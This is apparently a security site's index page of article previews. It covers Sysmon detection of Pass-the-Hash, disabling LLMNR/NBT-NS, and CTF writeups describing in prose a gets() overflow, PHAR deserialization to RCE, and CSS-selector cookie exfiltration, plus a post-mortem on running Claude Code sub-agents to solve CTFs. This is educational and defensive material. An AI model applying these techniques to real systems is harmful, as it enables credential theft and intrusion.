Pass-the-Hash attacks represent the most critical lateral movement vector in Windows environments, turning a single compromised endpoint into domain-wide catastrophe within hours. An attacker dumps NTLM hashes from memory using tools like Mimikatz, then authenticates to remote systems without cracking passwords — bypassing detection mechanisms focused on failed login attempts. Sysmon Event ID 10 provides the definitive detection capability for credential dumping by monitoring process memory access against the Local Security Authority Subsystem Service (LSASS). This guide delivers comprehensive Pass-the-Hash detection with Sysmon: configuration for memory access monitoring, analysis patterns for LSASS interactions, SIEM integration strategies, and incident response workflows that stop lateral movement before attackers achieve domain persistence. ...
Platform DalCTF 2026 (dalctf2026.com) Difficulty Mixed (Easy → Medium) OS Jeopardy — Crypto, Reverse Engineering, Web, Android Tags RSA modulus with small prime factor recovered by trial division, Bellcore CRT fault attack as the verification path, Playfair decryption against an un-keyed alphabet square, Huffman tree decode with inverted tiebreaker convention, LCG state recovery from one known plaintext byte, IEEE-754 bit-pattern reinterpretation via Quake-style float pointer cast, UPX-packed ELF unpacked into 44 per-byte check functions, Android APK static-string mining across MainActivity + strings.xml + ColorKt, HTML hidden attribute as a flag-hiding sink DalCTF 2026 is the DalCTF Jeopardy event with challenges spread across Crypto, Reverse Engineering, Web, and Android. The 2026 edition leans heavily into classical cryptography mistakes wrapped in misdirection — six of the nine challenges are crypto, and almost every one of them tries to push you toward a harder attack than the one that actually works. The flag format is dalctf{...} (occasionally DalCTF{...}), and the challenge names are explicit hints once you’ve solved them. ...
LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are legacy name resolution protocols that attackers exploit to capture credentials through poisoning attacks. When a Windows client can’t resolve a hostname via DNS, it falls back to broadcasting LLMNR and NBT-NS queries across the network — and attackers respond with malicious answers, capturing authentication attempts. Tools like Responder and Inveigh make this attack trivial, turning misconfigured name resolution into domain compromise. This guide shows how to disable LLMNR and NBT-NS via Group Policy, with registry paths, PowerShell verification, testing procedures, and complete rollback instructions for Windows 11 and Server 2025 environments. ...
Platform GPN CTF 2026 (kitctf) Difficulty Mixed (Easy → Hard) OS Jeopardy — Reverse, Crypto, Web, Pwn, Misc Tags AVX2 lane-swap miscompilation discovery + Kannan-embedding SIS lattice attack, NTRU mod-q reduction bug (c mod p == m), ECDSA nonce reuse from MD5(uuid3) collisions via fastcoll, eBPF signed-comparison verifier bypass with patched bzImage, JVM AOT cache override of bytecode, PHP 7.4 PHAR deserialization across two TCP races, Pydantic ForwardRef eval in create_model, CSS attribute-selector cookie exfiltration through Link: rel=stylesheet, holpy proof-checker thm re-axiomatization, knitout front/back-bed bitmap, ternary amplitude-modulated UART, Hamiltonian path on 250-node FSM extracted from jump tables, RFC 5424 syslog stream demux, Rust setuid TOCTOU symlink swap GPN CTF 2026 is the Gulaschprogrammiernacht CTF hosted annually by KITCTF at the GPN hacker camp in Karlsruhe, Germany. The 2026 edition runs a Jeopardy board across reverse engineering, crypto, web, pwn, and misc, with a sharp lean toward low-level systems bugs — a missing mod q in an NTRU implementation, a 4-way AVX2 lane-swap in a gcc -O3 -mavx2 build, a deleted BPF_ADJ_END_FROM_* check in a custom kernel, a JVM AOT cache that silently overrides a JAR method. The flavour throughout is kitchen — recipes, ovens, pots — and the flags universally read like Bavarian beer-tent slogans. ...
Platform GPN CTF 2026 (kitctf) Difficulty Meta — harness post-mortem OS Tooling — Claude Code (Opus 4.x, 1M context), Bash sandbox, sub-agents Tags orchestrating Claude Code with parallel sub-agents, using scratch directories as harness cache, keeping main-thread context lean by routing bulk output through sub-agents, building 'kill the wrong plan' as a forcing function, recognising harness hallucinations in less-common ecosystems by grep-confirmation The LLM harness post-mortem isn’t about one challenge — it’s about the workflow that produced the other 18 writeups in the GPN CTF 2026 repository. What the harness around Claude Code actually looked like during a 24-hour CTF, what it was good at, where it embarrassed me, and which design choices I’d keep. This writeup is the standalone version of the meta-writeup submitted for the Best LLM Harness Writeup prize at GPN CTF 2026. ...
![GPN CTF 2026 Recipe for Disaster writeup — gets() overflows char note[32] into an adjacent int price field](https://cybersecurityelite.com/images/articles/gpn-ctf-2026-recipe-for-disaster.webp)
Platform GPN CTF 2026 (kitctf) Difficulty Easy OS Pwn — stack buffer overflow, adjacent-field overwrite Tags reading the Item struct layout to confirm note and price are adjacent with no padding, sending 32 bytes of A plus four bytes of 0xff to set price to -1, observing verify_total trigger print_coupon, recognising gets() as a deprecated-in-C11 vulnerability since the Morris Worm (1988) Recipe for Disaster is the GPN CTF 2026 pwn challenge, and the most direct teaching example you’ll ever see of why gets was removed from C11. A note-taking program reads into a 32-byte note field with gets() — no length limit. Type 35 characters and the 33rd through 36th overflow into the adjacent int price field in the same Item struct. Set price = -1 and verify_total() triggers print_coupon() → flag. The flag itself names the lesson: ...
Platform GPN CTF 2026 (kitctf) Difficulty Medium-Hard OS Misc — holpy proof checker, LCF-style higher-order logic Tags reading 115 lines of checker glue around holpy's monitor, spotting list == 1 as a dead branch, recognising Theorem.get_extension always re-axiomatizes, exploiting concl.is_const('false') as a name comparison in an EmptyTheory scope, declaring a homemade false constant and proving it with a one-line theorem rule Customer Service is the GPN CTF 2026 misc challenge that builds an LCF-style higher-order-logic proof assistant from holpy, pretends to forbid axioms, and gets its guard wrong three ways. The exploit is a three-item JSON payload: declare a false constant of our own, axiomatize it, ship a one-line proof. The flag spells the lesson: ...
Platform GPN CTF 2026 (kitctf) Difficulty Medium OS Misc — signal recovery from high-entropy file, ternary amplitude modulation Tags rejecting the 'random noise' default hypothesis, computing per-window popcount means and run-lengths, plotting a 200-bin histogram to spot three peaks instead of two, recognising the structure as UART (start bit, 8 data bits LSB-first, stop bit) framed by a mid-amplitude idle marker, decoding 49 frames to ASCII Organized is the GPN CTF 2026 misc challenge whose entire trick is recognising the carrier’s organization. The handout is a 7,650,000-byte file that looks like noise — file(1) calls it data, every bit position is 1 with probability ≈ 0.287. The “organization” is hidden in the bit-density of windows, not in the bytes themselves: per-12,500-byte window popcount falls into one of three sharp levels, giving a 612-trit string. Past a 24-trit preamble, the rest is 49 UART-style frames of 12 trits each. Decode → ASCII → flag: ...
Platform GPN CTF 2026 (kitctf) Difficulty Medium-Hard OS Web — PHP 7.4, PHAR metadata unserialize, two-TCP-connection trick Tags recognising md5_file and file_get_contents both open separate TCP connections to a URL, hosting a connection-counting HTTP server that returns different responses per attempt, crafting a PHAR with a User object metadata that fires system() in __destruct, triggering PHAR unserialize via md5_file(phar:///tmp/...) for RCE Pharry is the GPN CTF 2026 PHP challenge that turns a md5_file + file_get_contents integrity-check pair into a PHAR deserialization. Both PHP functions open separate TCP connections to the URL they’re given, so a counting server can serve one response to md5_file (close to make it return FALSE) and another to file_get_contents (return a PHAR). The PHAR ends up at /tmp/remote_file.jpg. A second request to phar:///tmp/remote_file.jpg/a.txt triggers PHP’s metadata unserialize(), which fires User::__destruct() → system("rm " . $avatar_path) → RCE. ...
![GPN CTF 2026 Tinyweb writeup — Link header CSS injection plus body[onload^=...] attribute selectors leak the cookie character-by-character](https://cybersecurityelite.com/images/articles/gpn-ctf-2026-tinyweb.webp)
Platform GPN CTF 2026 (kitctf) Difficulty Medium OS Web — Node http, Link header injection, CSS attribute-selector exfil Tags recognising unescape as a percent-decoder that mangles header values, splitting on Link header's comma+semicolon structural separators, injecting a second link entry with rel=stylesheet, hosting the CSS on a serveo-style tunnel that doesn't show an interstitial, iterating body[onload^=prefix] one character at a time Tinyweb is GPN CTF 2026’s pure-web challenge — 481 bytes of one-line Node http server with two reflection points and one admin bot that visits attacker-supplied URLs with the flag in a cookie. The intended path turns out to be an XS-Leaks-style CSS attribute-selector exfiltration: inject rel=stylesheet into the Link header via unescape percent-decoding, host CSS that uses body[onload^="prefix"] selectors to fire background: url(...) requests, iterate one character at a time. ~45 iterations of ~35 seconds each recover: ...